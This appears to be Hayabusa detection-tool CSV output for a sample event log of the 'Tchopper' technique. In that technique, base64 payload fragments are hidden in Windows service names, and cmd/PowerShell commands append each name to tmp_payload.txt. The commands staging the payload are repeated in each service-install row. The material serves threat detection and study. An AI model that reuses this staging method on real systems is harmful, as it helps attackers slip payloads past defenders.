Tchopper.evtx" +2021-11-03 08:18:48.663 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:48.663 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:48.663 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:50.135 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:50.135 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:50.135 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:51.588 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:51.588 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:51.588 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:53.026 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:53.026 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:53.026 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:54.457 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:54.457 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:54.457 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:55.903 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:55.903 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:55.903 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:57.355 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:57.355 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:57.355 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:58.798 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:58.798 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:58.798 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:00.236 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:00.236 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:00.236 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:01.719 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:01.719 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:01.719 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:03.160 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:03.160 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:03.160 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:04.601 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:04.601 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:04.601 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:06.043 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:06.043 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | 